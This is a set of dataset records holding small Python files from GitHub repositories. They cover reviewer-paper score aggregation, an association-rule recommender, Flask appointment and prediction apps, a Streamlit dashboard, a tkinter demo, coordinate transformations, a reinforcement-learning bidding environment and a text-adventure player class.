1.0/6.0]}\n bid2exponent = pd.DataFrame(bid2exponent)\n scores = scores.reset_index().merge(bid2exponent,how='left',on='bid').set_index(['paper','reviewer'])\n epsilon = 0.0000001\n \n #match score: avg of ntpms and nacl\n scores['ms'] = (scores['ntpms'] + scores['nacl'])/2 \n #if ntpms is na, then overwrite by nacl\n scores.loc[scores['ntpms'].isna(),'ms'] = scores['nacl'].loc[scores['ntpms'].isna()]\n #if nacl is na, overwrite by ntpms\n 
scores.loc[scores['nacl'].isna(),'ms'] = scores['ntpms'].loc[scores['nacl'].isna()]\n\n #agg score: avg of match score and keyword score\n scores['scores_base'] = (scores['ms'] + scores['nk'])/2\n #if match score is na, overwrite by keyword score\n scores.loc[scores['ms'].isna(),'scores_base'] = scores['nk'].loc[scores['ms'].isna()]\n #if keyword score is na, overwrite by match score\n scores.loc[scores['nk'].isna(),'scores_base'] = scores['ms'].loc[scores['nk'].isna()]\n \n # tweaking based on bid value\n condn = scores['is_positive'] & (scores['nk'] < epsilon)\n #if bid is positive and keyword score < epsilon, overwrite by match score\n scores.loc[condn,'scores_base'] = scores['ms'].loc[condn]\n \n #if everything is na, score = 0\n scores.loc[scores['scores_base'].isna(),'scores_base'] = 0.0\n #\n scores['score'] = scores['scores_base']**(1.0/scores['exponent'])\n \n # if score is below this thr, then backoff to keyword score only\n lower_thr = 0.15\n #select all scores less than 0.15\n condn_ll = (scores['score'] <= lower_thr) & (~scores['nk'].isna())\n #recompute them as ((nk)^(1/exponent)).clip(upper=0.15)\n scores.loc[condn_ll,'score'] = (scores['nk'].loc[condn_ll]**(1.0/scores['exponent'].loc[condn_ll])).clip(upper=lower_thr)\n return scores\n\ndef compute_scores(config=None):\n\n scores = pd.read_csv(config['RAW_SCORES_FILE']).set_index(['paper','reviewer'])\n bids = pd.read_csv(config['BIDS_FILE']).set_index(['paper','reviewer'])\n scores = scores.join(bids)\n scores['bid'] = scores['bid'].fillna(config['DEFAULT_BID_WHEN_NO_BIDS'])\n\n scores = get_scores(config,scores)\n scores = scores[['score']]\n num_entries_before = scores.size\n scores = scores.query('score > 0')\n num_entries_after = scores.size\n logger.info(f'Filtered scores <= 0. {(num_entries_before - num_entries_after) / num_entries_before} fraction removed ...')\n logger.info(f\"Caching aggregated score to {config['CACHED_SCORES_FILE']} to save time during next run. To recompute, delete this file and rerun this script.\")\n scores.to_csv(config['CACHED_SCORES_FILE'])\n return scores\n\n","repo_name":"ChrisCameron1/LargeConferenceMatching","sub_path":"compute_scores.py","file_name":"compute_scores.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"99"} +{"seq_id":"16235156034","text":"\r\n\r\n\r\n\r\n###### Data Preparation ####\r\n\r\n\"\"\"Step 1: read armut_data.csv \"\"\"\r\n\r\n\r\nimport pandas as pd\r\npd.set_option(\"display.max_columns\", None)\r\nfrom mlxtend.frequent_patterns import apriori, association_rules\r\n\r\ndf = pd.read_csv(\"armut_data.csv\")\r\n\r\n\"\"\"\r\nStep 2: ServiceID represents a different service for each CategoryID.\r\n Create a new variable that represents these services by combining ServiceID \r\n and CategoryID with an underscore \"_\".\r\n\"\"\"\r\n\r\ndf[\"Hizmet\"] = df[\"ServiceId\"].astype(str) + \"_\" + df[\"CategoryId\"].astype(str)\r\n\r\ndf.head()\r\n\r\n\"\"\" \r\nStep 3 : The data set consists of the date and time when the service transactions were made, \r\nand there is no basket definition (e.g., invoice). \r\nIn order to apply Association Rule Learning, a basket definition (e.g., invoice) needs to be created. 
\r\nHere, the basket definition refers to the services each customer receives on a monthly basis.\r\nFor example, customer with ID 7256 has a basket consisting of services 9_4 and 46_4 that they received in August 2017,\r\nand another basket consisting of services 9_4 and 38_4 that they received in October 2017. \r\nBaskets should be identified with a unique ID. To do this, first create a new date variable that only includes the year and month. \r\nCombine the UserID and the newly created date variable with \"_\" and assign it to a new variable called ID. \r\n\"\"\"\r\n\r\ndf.info\r\n\r\ndf[\"CreateDate\"] = pd.to_datetime(df[\"CreateDate\"])\r\ndf[\"New_Date\"] = df[\"CreateDate\"].dt.strftime(\"%Y-%m\")\r\n\r\ndf.info()\r\ndf.head()\r\n\r\ndf[\"SepetId\"] = df[\"UserId\"].astype(str) + \"_\" + df[\"New_Date\"]\r\n\r\n\r\n\r\n\"\"\"Step 1 : Create pivot table \"\"\"\r\n\r\n\r\n\r\ninvoice_product_df = df.groupby([\"SepetId\", \"Hizmet\"])[\"Hizmet\"].count().unstack().fillna(0).applymap(lambda x: 1 if x > 0 else 0)\r\ninvoice_product_df.head()\r\n\r\n\"\"\"Step : 2 Create Association Rules \"\"\"\r\nasr_df = apriori(invoice_product_df, min_support=0.01, use_colnames=True)\r\nasr_rules = association_rules(asr_df, metric=\"support\", min_threshold=0.01)\r\nasr_rules.head()\r\n\r\n\r\n\"\"\" Step 3 : \"Using the arl_recommender function,\r\n provide service recommendations to a user who recently received the service 2_0. \"\"\"\r\n\r\ndef arl_recommender(rules_df, product_id, rec_count=1):\r\n sorted_rules = rules_df.sort_values(\"lift\", ascending=False)\r\n recommendation_list = []\r\n for i, product in sorted_rules[\"antecedents\"].items():\r\n for j in list(product):\r\n if j == product_id:\r\n recommendation_list.append(list(sorted_rules.iloc[i][\"consequents\"]))\r\n\r\n recommendation_list = list({item for item_list in recommendation_list for item in item_list})\r\n return recommendation_list[:rec_count]\r\n\r\narl_recommender(asr_rules, \"2_0\", 1)\r\n","repo_name":"musaogdu/ArmutProject","sub_path":"ArmutProject.py","file_name":"ArmutProject.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"24097030759","text":"from model.doctor_list import DoctorList\nfrom model.appointment_list import AppointmentList\nfrom controller.appointment_controller import AppointmentController\nfrom flask import Flask\nfrom view.flask_wrapper import FlaskAppWrapper\nfrom model.patient_list import PatientList\nfrom controller.doctor_controller import DoctorController\nfrom controller.patient_controller import PatientController\n\nflask_app = Flask(__name__)\n\napp = FlaskAppWrapper(flask_app)\n\ndl = DoctorList()\npl = PatientList()\nal = AppointmentList()\nac = AppointmentController()\ndc = DoctorController()\npc = PatientController()\n\n# create appointment\napp.add_endpoint('/api/add',\n 'add_app', ac.create_appointment, methods=['POST'])\n\n# cancel appointment\napp.add_endpoint('/api/cancel',\n 'cancel_app', ac.cancel_appointment, methods=['DELETE'])\n\n# get appointment by doctor/patient name\napp.add_endpoint('/api/get',\n 'get_doc_appointments', ac.get_appointments)\n\n# get all appointments\napp.add_endpoint('/api/all', 'get_all_appointments', ac.get_all_appointments)\n\n# extra endpoint to fetch via ID\napp.add_endpoint('/api/get_by_id', 'get_apps_by_id', ac.get_appointments_by_id)\n\n# get doctor details by ID\napp.add_endpoint('/api/get/doctor', 'get_doc_by_id', dc.get_doctor_details)\n\n# 
add doctor\napp.add_endpoint('/api/add/doctor', 'add_doc',\n dc.create_doctor, methods=['POST'])\n\n# delete doctor by ID\napp.add_endpoint('/api/delete/doctor', 'delete_doctor',\n dc.delete_doctor, methods=['DELETE'])\n\n# get patient details by ID\napp.add_endpoint('/api/get/patient', 'get_patient_by_id',\n pc.get_patient_details)\n\n# add patient\napp.add_endpoint('/api/add/patient', 'add_patient',\n pc.create_patient, methods=['POST'])\n\n# delete patient by ID\napp.add_endpoint('/api/delete/patient', 'delete_patient',\n pc.delete_patient, methods=['DELETE'])\n\n# view all doctors\napp.add_endpoint('/api/get/doctors', 'get_all_docs', dc.get_all_doctors)\n\n# view all patients\napp.add_endpoint('/api/get/patients', 'get_all_patients', pc.get_all_patients)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"raghavm1/d4l-task","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"4197825675","text":"from flask import Flask,jsonify,request, render_template\nimport units\n\napp = Flask(__name__)\n\n@app.route('/')\ndef man():\n return render_template('home.html')\n\n@app.route('/predict',methods = ['POST'])\ndef pred():\n \n data = request.form\n if request.method == 'POST':\n print('Input data is:',data)\n x = int(data['x'])\n y = int(data['y'])\n z = int(data['z'])\n \n\n msg = units.pred_class(x,y,z)\n\n return render_template('after.html', data=int(msg))\n else:\n return jsonify({\"message\":\"unsuccessful\"})\n \n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=8080, debug=True) \n\n","repo_name":"sd72219/awsfirst","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"8214945239","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport copy\nimport streamlit as st\n\nst.title(\"Imperial Healthtech Customer Activity Dashboard\")\nst.write(\"Muhamad Bagus Septian\")\n\ndf = pd.read_csv(\"app_data.csv\")\n\n@st.cache(suppress_st_warning=True, allow_output_mutation=True)\ndef load_data(df):\n df = pd.read_csv(\"app_data.csv\")\n return df\n\ndata = copy.deepcopy(load_data(df))\n\ndata['Date'] = pd.to_datetime(data['Date'], format='%Y-%m-%d')\n\nsns.set()\nst.subheader(\"Daily Device Installs in November 20222\")\nfig1, ax1 = plt.subplots(figsize=(20,5))\nsns.lineplot(x=data[\"Date\"], data=data, y=data[\"Daily Device Installs\"])\nst.pyplot(fig1)\n\nst.subheader(\"Daily User Installs in November 20222\")\nfig2, ax2 = plt.subplots(figsize=(20,5))\nsns.lineplot(x=data[\"Date\"], data=data, y=data[\"Daily User Installs\"])\nsns.set()\nst.pyplot(fig2)\n\nst.subheader(\"Daily User Uninstalls in November 20222\")\nfig3, ax3 = plt.subplots(figsize=(20,5))\nsns.lineplot(x=data[\"Date\"], data=data, y=data[\"Daily User Uninstalls\"])\nsns.set()\nst.pyplot(fig3)\n\nst.subheader(\"Active Device Installs in November 20222\")\nfig4, ax4 = plt.subplots(figsize=(20,5))\nsns.lineplot(x=data[\"Date\"], data=data, y=data[\"Active Device Installs\"])\nsns.set()\nst.pyplot(fig4)\n\nst.subheader(\"Install events in November 20222\")\nfig5, ax5 = plt.subplots(figsize=(20,5))\nsns.lineplot(x=data[\"Date\"], data=data, y=data[\"Install events\"])\nsns.set()\nst.pyplot(fig5)\n\nst.subheader(\"Update events in November 20222\")\nfig6, ax6 = 
plt.subplots(figsize=(20,5))\nsns.lineplot(x=data[\"Date\"], data=data, y=data[\"Update events\"])\nsns.set()\nst.pyplot(fig6)\n\nst.subheader(\"Uninstall events in November 20222\")\nfig7, ax7 = plt.subplots(figsize=(20,5))\nsns.lineplot(x=data[\"Date\"], data=data, y=data[\"Uninstall events\"])\nsns.set()\nst.pyplot(fig7)\n\n","repo_name":"bagus-septian/imperial_healthtech","sub_path":"da_test.py","file_name":"da_test.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10308755188","text":"import tkinter as tk\n\nunesena_slova = ''\n\ndef handle_keypress(event):\n print(event.char)\n global unesena_slova\n unesena_slova += str(event.char)\n label_tekst_var.set(unesena_slova)\n\nroot = tk.Tk()\nroot.title('Algebra - Python Developer')\nroot.geometry('600x400')\n\nlabel_tekst_var = tk.StringVar()\nlabel_tekst_var.set('Ovo je mjesto gdje će se prikazivati unesena slova')\n\nlabel_naslov = tk.Label(root,\n text= 'Key Event',\n font = ('Segoe UI', 18))\n\nlabel_naslov.grid(column=0, row=0)\n\nlabel_ispis = tk.Label(root, \n textvariable=label_tekst_var, font = ('Segoe UI', 24), fg = 'red')\n\nlabel_ispis.grid(column=0, row = 1)\n\nroot.bind(\"\", handle_keypress)\n\nroot.mainloop()","repo_name":"pinjamar/python_tasks_collection","sub_path":"algebra/19_tkinter_events_1.py","file_name":"19_tkinter_events_1.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"1746044000","text":"\nimport numpy as np\nfrom scipy import linalg\nimport math\n\ndef conforme(gcpD1, gcpD2, knowD1, output, verbose=False):\n L = np.loadtxt(str(gcpD1))\n A = np.zeros((2*L.shape[0],4),float)\n A[ ::2, 0] = 1.0\n A[1::2, 1] = 1.0\n A[ ::2, 2] = L[:,0]\n A[1::2, 2] = L[:,1]\n A[ ::2, 3] = L[:,1]\n A[1::2, 3] = -L[:,0]\n G = np.loadtxt(str(gcpD2))\n Y = np.zeros((2*G.shape[0],1),float)\n Y[ ::2, 0] = G[:,0]\n Y[1::2, 0] = G[:,1]\n N = np.dot(A.T.conj(), A)\n T = np.dot(A.T.conj(), Y)\n C = np.dot(linalg.inv(N), T)\n Lambda = abs(C[2]+C[3]*1j)\n Alpha = np.angle(C[2]+C[3]*1j)\n E0 = C[0]\n N0 = C[1]\n LX = np.loadtxt(str(knowD1))\n ss = LX.shape[0]\n pq = G.shape[0]\n ENglob = np.zeros((ss,2),float)\n lam = math.sqrt(C[2]** + C[3]**2)\n alp = np.arctan(C[3] / C[2]) / (math.pi / 180.)\n for i in np.arange(ss):\n E2 = E0+LX[i,0]*C[2]+LX[i,1]*C[3]\n N2 = N0+LX[i,1]*C[2]-LX[i,0]*C[3]\n ENglob[i,:] = np.hstack((E2,N2))\n np.savetxt(output, ENglob)\n sq = LX.shape[0]\n sqx = np.zeros((G.shape[0],1),float)\n sqy = np.zeros((G.shape[0],1),float)\n sqx[ ::1, 0] = G[:,0]\n sqy[::1, 0] = G[:,1]\n sizeq = sqx.shape[0]\n scartix = np.zeros((sizeq,1),float)\n scartiy = np.zeros((sizeq,1),float)\n scartiqx = np.zeros((sizeq,1),float)\n scartiqy = np.zeros((sizeq,1),float)\n sqm = np.zeros((sizeq,1),float)\n for i in np.arange(sizeq):\n Vx = E0 + LX[i,0] * C[2,0] + LX[i,1] * C[3,0] - sqx[i,0]\n Vy = N0 + LX[i,1] * C[2,0] - LX[i,0] * C[3,0] - sqy[i,0]\n sqmr = math.sqrt(Vx**2 + Vy**2)\n sqm[i,:] = sqmr\n scartiqx[i,0] = Vx**2\n scartiqy[i,0] = Vy**2\n scartix[i,0] = Vx\n scartiy[i,0] = Vy\n scartiq = np.concatenate((scartiqx,scartiqy))\n scarti = np.concatenate((scartix,scartiy))\n scartixy = np.concatenate((scartiqx,scartiqy),1)\n scartiqxy = np.concatenate((scartix,scartiy),1)\n sumscarti = sum(scartiq)\n varqp = sumscarti / ((2 * sizeq) - 4)\n varp = math.sqrt(varqp)\n varianzaq = varqp * linalg.inv(N)\n varianza = varp * linalg.inv(N)\n 
varqunitp = np.diag(varianzaq)\n varunitp = np.diag(varianza)\n prec = np.zeros((sq,2),float)\n for i in np.arange(sq):\n xx = math.sqrt((LX[i,0]**2) * (varqunitp[2]) + (LX[i,1]**2) * (varqunitp[3]) + varqunitp[0])\n yy = math.sqrt((LX[i,1]**2) * (varqunitp[2]) + (LX[i,0]**2) * (varqunitp[3]) + varqunitp[1])\n prec[i,:] = np.hstack((xx,yy))\n errore = np.concatenate((scartixy,scartiqxy,sqm),1)\n np.savetxt(output+str('_precision'), prec)\n np.savetxt(output+str('_error'), errore)\n err_med = sum(sqm) / pq\n a = C[2,0]\n b = C[3,0]\n lamvar = math.sqrt(((((2 * a) / math.sqrt(a**2 + b**2))**2) * varqunitp[2]) + ((((2 * b) / math.sqrt(a**2 + b**2))**2) * varqunitp[3]))\n alphavar = math.sqrt(((((-b / a**2) / (1 + (b / a)**2))**2) * varqunitp[2]) + (((1 / a) / (1 + (b / a)**2))**2 * varqunitp[3])) / (math.pi / 180.)\n results = str('Trasformation Parameters :\\n')\n results += str(\"\\n\")\n results += str('Tx : ')+str(C[0,0])+'\\n'\n results += str('Ty : ')+str(C[1,0])+'\\n'\n results += str('Rigid Rotation : ')+str(alp)+'\\n'\n results += str('Scale Factor : ')+str(lam)+'\\n'\n results += str(\"\\n\")\n results += str('Trasformation Parameters Variance :\\n')\n results += str(\"\\n\")\n results += str('Sigma quadro Rigid Rotation :')+str(alphavar)+'\\n'\n results += str('Sigma quadro Scale Factor:')+str(lamvar)+'\\n'\n results += str(\"\\n\")\n results += str('Results : ')+str(\"\\n\")\n results += str(ENglob)\n results += '\\n'\n results += str('Mean Error : ')+'\\n'\n results += str(err_med)+'\\n'\n results += '\\n'\n results += str('Precision : ')+'\\n'\n results += str(prec)\n results += '\\n'\n results += str('Error : ')+str(\"\\n\")\n results += str(errore)\n results = results.replace('[','').replace(']','')\n if verbose:\n print(results)\n return ENglob\n\ndef affine(gcpD1, gcpD2, knowD1, output, verbose=False):\n L = np.loadtxt(str(gcpD1))\n A = np.zeros((2*L.shape[0],6),float)\n A[ ::2, 2] = 1.0\n A[1::2, 5] = 1.0\n A[ ::2, 0] = L[:,0]\n A[1::2, 4] = L[:,1]\n A[ ::2, 1] = L[:,1]\n A[1::2, 3] = L[:,0]\n G = np.loadtxt(str(gcpD2))\n Y = np.zeros((2*G.shape[0],1),float)\n Y[ ::2, 0] = G[:,0]\n Y[1::2, 0] = G[:,1]\n N = np.dot(A.T.conj(), A)\n T = np.dot(A.T.conj(), Y)\n C = np.dot(linalg.inv(N), T)\n E0 = C[2]\n N0 = C[5]\n LX = np.loadtxt(str(knowD1))\n ss = LX.shape[0]\n ENglob = np.zeros((ss,2),float)\n for i in np.arange(ss):\n E2 = E0+LX[i,0]*C[0]+LX[i,1]*C[1]\n N2 = N0+LX[i,0]*C[3]+LX[i,1]*C[4]\n ENglob[i,:] = np.hstack((E2,N2))\n np.savetxt(output,ENglob)\n sq = LX.shape[0]\n sqx = np.zeros((G.shape[0],1),float)\n sqy = np.zeros((G.shape[0],1),float)\n sqx[ ::1, 0] = G[:,0]\n sqy[::1, 0] = G[:,1]\n sizeq = sqx.shape[0]\n scartix = np.zeros((sizeq,1),float)\n scartiy = np.zeros((sizeq,1),float)\n scartiqx = np.zeros((sizeq,1),float)\n scartiqy = np.zeros((sizeq,1),float)\n sqm = np.zeros((sizeq,1),float)\n for i in np.arange(sizeq):\n Vx = E0 + LX[i,0] * C[0,0] + LX[i,1] * C[1,0] - sqx[i,0]\n Vy = N0 + LX[i,0] * C[3,0] + LX[i,1] * C[4,0] - sqy[i,0]\n sqmr = math.sqrt(Vx**2 + Vy**2)\n sqm[i,:] = sqmr\n scartiqx[i,0] = Vx**2\n scartiqy[i,0] = Vy**2\n scartix[i,0] = Vx\n scartiy[i,0] = Vx\n scartiq = np.concatenate((scartiqx,scartiqy))\n scarti = np.concatenate((scartix,scartiy))\n scartixy = np.concatenate((scartiqx,scartiqy),1)\n scartiqxy = np.concatenate((scartix,scartiy),1)\n sumscarti = sum(scartiq)\n varqp = sumscarti / ((2 * ss) - 4)\n varp = math.sqrt(varqp)\n varianzaq = varqp * linalg.inv(N)\n varianza = varp * linalg.inv(N)\n varqunitp = np.diag(varianzaq)\n varunitp = 
np.diag(varianza)\n prec = np.zeros((sq,2),float)\n for i in np.arange(sq):\n xx = math.sqrt((LX[i,0]**2) * (varqunitp[0]) + (LX[i,1]**2) * (varqunitp[1]) + varqunitp[2])\n yy = math.sqrt((LX[i,1]**2) * (varqunitp[0]) + (LX[i,0]**2) * (varqunitp[1]) + varqunitp[5])\n prec[i,:] = np.hstack((xx,yy))\n errore = np.concatenate((scartixy,scartiqxy,sqm),1)\n np.savetxt(output+str('_precision'), prec)\n np.savetxt(output+str('_error'), errore)\n err_med = sum(sqm) / sq\t\t\n results = str('Trasformation Parameters :\\n')\n results += str('Tx : ')+str(C[2,0])+'\\n'\n results += str('Ty : ')+str(C[5,0])+'\\n'\n results += str('Rigid Rotation X : ')+str(C[1,0])+'\\n'\n results += str('Rigid Rotation Y : ')+str(C[3,0])+'\\n'\n results += str('Scale Factor X : ')+str(C[0,0])+'\\n'\n results += str('Scale Factor Y : ')+str(C[4,0])+'\\n'\n results += '\\n'\n results += str('Results : ')+'\\n'\n results += str(ENglob)\n results += str(\"\\n\")\n results += str('Mean Error : ')+'\\n'\n results += str(err_med)+'\\n'\n results += '\\n'\n results += str('Precision : ')+'\\n'\n results += str(prec)+'\\n'\n results += '\\n'\n results += str('Error : ')+'\\n'\n results += str(errore)\n results = results.replace('[','').replace(']','')\n if verbose:\n print(results)\n return ENglob\n\ndef vcross(v):\n x, y, z = v\n mat = np.zeros((3,3))\n mat[0] = [ 0, -z, y]\n mat[1] = [ z, 0, -x]\n mat[2] = [-y, x, 0]\n return mat\n \n\ndef block(v):\n return np.hstack((np.eye(3), -vcross(v), v[:, np.newaxis]))\n\ndef helmert(gcp1, gcp2, inputf, output, verbose=False):\n pt1 = np.loadtxt(str(gcp1))\n pt2 = np.loadtxt(str(gcp2))\n A = []\n rhs = []\n for i in range(3):\n A.append(block(pt1[i]))\n rhs.append((pt2[i] - pt1[i])[:, np.newaxis])\n A = np.vstack(A)\n rhs = np.vstack(rhs)\n sol = np.linalg.lstsq(A, rhs)[0]\n res = rhs - np.dot(A, sol)\n XYZ = np.loadtxt(str(inputf))\n XYZsize = XYZ.shape[0]\n ENZglob = np.zeros((XYZsize,3),float)\n for i in np.arange(XYZsize):\n X = sol[0] + (1 + sol[6]) * ( XYZ[i,0] - sol[5] * XYZ[i,1] + sol[4] * XYZ[i,2] ) \n Y = sol[1] + (1 + sol[6]) * ( sol[5] * XYZ[i,0] + XYZ[i,1] - sol[3] * XYZ[i,2] ) \n Z = sol[2] + (1 + sol[6]) * ( -sol[4] * XYZ[i,0] + sol[3] * XYZ[i,1] + XYZ[i,2] ) \n ENZglob[i,:] = np.hstack((X,Y,Z))\n np.savetxt(output,ENZglob)\n hresults = str('Trasformation Parameters :\\n')\n hresults += str(\"\\n\")\n hresults = str('Traslation :\\n')\n hresults += str(\"\\n\")\n hresults += str('Tx : ')+str(sol[0])+'\\n'\n hresults += str('Ty : ')+str(sol[1])+'\\n'\n hresults += str('Tz : ')+str(sol[2])+'\\n'\n hresults += str(\"\\n\")\n hresults += str('Rotation :\\n ')\n hresults += str(\"\\n\")\n hresults += str('Rx : ')+str(sol[3])+'\\n'\n hresults += str('Ry : ')+str(sol[4])+'\\n'\n hresults += str('Rz : ')+str(sol[5])+'\\n'\n hresults += str(\"\\n\")\n hresults += str('Scale Factor :\\n ')\n hresults += str(\"\\n\")\n hresults += str(\"S : \")+str(sol[6])+'\\n'\n hresults += str(\"\\n\")\n hresults += str('Trasformation Residuals :\\n')\n hresults += str(\"\\n\")\n hresults += str(res)+'\\n'\n hresults += str('Results : \\n')\n hresults += str(\"\\n\")\n hresults += str(ENZglob)\n hresults += '\\n'\n hresults = hresults.replace('[','').replace(']','')\n if verbose:\n print(hresults)\n return ENZglob","repo_name":"epifanio/OSGeospatial-Notebooks","sub_path":"GSoC-2015/Numerical Cartography/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":9311,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"99"} 
+{"seq_id":"13768087094","text":"import sys\n\nsys.path.append('../Code/')\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom collections import namedtuple\nfrom utils import new_performance\nimport time\n\nbeginning_time = time.time()\nimport os\n\nDATA_DIR = os.path.join('../', 'Data')\nimport pandas as pd\n\nnp.set_printoptions(precision=3, suppress=1)\nplt.style.use('seaborn-notebook')\n\n\ndef timtime(t):\n print(\">\", int(time.time() - t), \"seconds elapsed\")\n\n\n# implement budget on the agent, initalise to 6250*1000\n\n# @title FeatureGrid\nclass FeatureGrid(object):\n\n def __init__(self, feats, true_y, impression_values, verbose=False, discount=1.0, update_thresh=1e5,\n budget=6250 * 1000):\n\n self._start_state = (0)\n self._state = self._start_state\n self._number_of_states = feats.shape[0]\n self._discount = discount\n self.features = feats\n self.num_feats = feats.shape[1]\n self.true_y = true_y\n self.lambd_0 = (1.0 / 75275.275275)\n self.lambd = (1.0 / 75275.275275)\n self.impression_values = impression_values\n self.fullbudget = budget\n self.budget = budget\n self.verbose = verbose\n self.all_actions = [-0.5, -0.15, -0.08, 0, 0.08, 0.15, 0.5]\n self.update_thresh = update_thresh\n self.totalreward = 0\n self.totalr_regularizer = 159\n\n def reset_budget(self):\n self.budget = self.fullbudget\n\n def step(self, action_int):\n\n # need to return reward,discount,nextstate, won_bid\n action = self.all_actions[int(action_int)]\n # if (self._state % self.update_thresh)==0: maybe do not need this to control lambda\n\n self.lambd = (self.lambd_0 + self.lambd_0 * action) # lambda adjustment\n\n bid = (self.impression_values[self._state] / self.lambd)\n pay = self.true_y.payprice[self._state]\n\n if (bid <= self.budget) and (bid > 0):\n\n if pay < bid:\n\n won_bid = 1\n\n elif pay == bid: # if bid=bidprice then we pick randomly\n\n won_bid = np.random.randint(2)\n\n else:\n\n won_bid = 0\n\n if won_bid:\n self.budget = self.budget - pay # update budget consumption feature\n r = self.impression_values[self._state]\n\n else:\n r = 0\n\n else:\n r = 0\n won_bid = 0\n\n self.features[self._state + 1, -3] = (self.budget / self.fullbudget) # update budget left feature\n self.totalreward += (r * 1.0 / self.totalr_regularizer * 1.0) # update total reward/ total achievable reward\n self.features[self._state + 1, -2] = self.totalreward * 1.0 # update total reward\n\n self.features[self._state + 1, -1] = (\n self._number_of_states * 1.0 - self._state * 1.0) / self._number_of_states * 1.0 # total time left ratio\n\n # if (self._state%100000)==0:\n # print(\"budget left\",self.features[self._state+1,-3])\n # print(\"total r\",self.totalreward)\n # print(\"time left\",self.features[self._state+1,-1])\n # print(\"LAMBDA IS: \",self.lambd,\" ACTION WAS: \",action)\n\n next_s = self.features[self._state + 1, :]\n self._state += 1\n discount = 1\n if self.verbose:\n print(\"your bid was: \", bid, \" and won_bid is =\", won_bid)\n print(\"you paid: \", pay)\n print(\"state is: \", self._state)\n print(\"budget is: \", self.budget)\n print('total reward is', self.totalreward)\n\n clicks = self.true_y.click[self._state] * won_bid # if you got a click or not\n\n return r, discount, next_s, won_bid, clicks\n\n def get_obs(self):\n\n return self.features[self._state, :]\n\n def int_to_features(self, int_state):\n return self.features[int_state, :]\n\n def number_of_features(self):\n return self.num_feats\n\n def number_of_actions(self):\n return 7\n\n\nif __name__ == \"__main__\":\n\n train_X = 
np.load('./train_X.npy')\n train_y = np.load('./train_y.pkl')\n test = False\n model = False\n\n if test:\n # Test you can retrieve features\n\n feats = np.ones((10, 10))\n lables = np.ones((10,))\n impression_vals = np.linspace(0.1, 0.5, 10)\n # Instantiate the non tabular version of the environment.\n feat_grid = FeatureGrid(feats, lables, impression_vals)\n print(\"get features is:\", feat_grid.int_to_features(1))\n print(\"get number of features is:\", feat_grid.number_of_features())\n print(\"get number of actions is:\", feat_grid.number_of_actions())\n pass\n\n # advanced testing - step function\n if model:\n import pickle\n pf = \"../Models/tim_xgb_click.pkl\"\n with open(pf, 'rb') as file:\n GBDT = pickle.load(file)\n train_X2 = np.load('./train_X2.npy')\n impression_values = GBDT.predict(train_X2)\n else:\n impression_values = np.linspace(0.1, 0.5, 10) # TANYAS temp fix to emulate the result from XGBOOST\n\n feat_grid = FeatureGrid(train_X, train_y, impression_values, verbose=True)\n print(\"######################\")\n print(\"###########TEST1###########\")\n print(\"step output is:\", len(feat_grid.step(-0.5)))\n print(\"######################\")\n print(\"###########TEST2###########\")\n print(\"reward output is:\", feat_grid.step(-0.5)[0])\n print(\"######################\")\n print(\"###########TEST3###########\")\n print(\"discount output is:\", feat_grid.step(-0.5)[1])\n print(\"######################\")\n print(\"###########TEST4###########\")\n\n print(\"next_s output is:\", feat_grid.step(-0.5)[2].shape)\n\n pass\n","repo_name":"triptease/uclwe-rtb-clone","sub_path":"i-ACR/CFeatureGrid.py","file_name":"CFeatureGrid.py","file_ext":"py","file_size_in_byte":5738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11191793344","text":"\n\n### Player Setup ###\nclass Player:\n def __init__(self, zonemap):\n self.name = ''\n self.triangle = ''\n self.hp = 0\n self.mp = 0\n self.status_effects = []\n self.location = 'Swamp Swimming Hole' ## Also known as 'address' ##\n self.game_over = False \n self._teleport = False \n self._keys = False\n self._zm = zonemap\n \n \n def reset_hp_mp(self):\n if self.triangle == 'scalene':\n self.hp = 120\n self.mp = 40\n elif self.triangle == 'equilateral':\n self.hp = 40\n self.mp = 120\n elif self.triangle == 'isosceles':\n self.hp = 80\n self.mp = 80\n\n def print_location(self):\n address = self.location\n room = self._zm[address]\n print (\"\")\n print (\"#\"*(4 + len(address)))\n print (\"# \" + address.upper() + \" #\")\n print (\"# \"+ room['description'].replace('\\n', '') + \" #\")\n print (\"#\"*(4 + len(address)) )\n\n def player_look(self):\n address = self.location\n room = self._zm[address]\n print (\"\")\n print (\"#\"*(4 + len(address)))\n print (\"# \" + address.upper() + \" #\")\n print (\"# \"+ room['look'].replace('\\n', '') + \" #\")\n print (\"#\"*(4 + len(address)) )\n\n def player_glance(self):\n address = self.location\n room = self._zm[address]\n print (\"\")\n print (\"#\"*(4 + len(address)))\n print (\"# \" + address.upper() + \" #\")\n print (\"# \"+ room['glance'].replace('\\n', '') + \" #\")\n print (\"#\"*(4 + len(address)) )\n\n \n\n def can_teleport(self):\n return self._teleport\n\n def has_keys(self):\n return self._keys","repo_name":"ExerciseAndrew/Marshwallow","sub_path":"src/Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} 
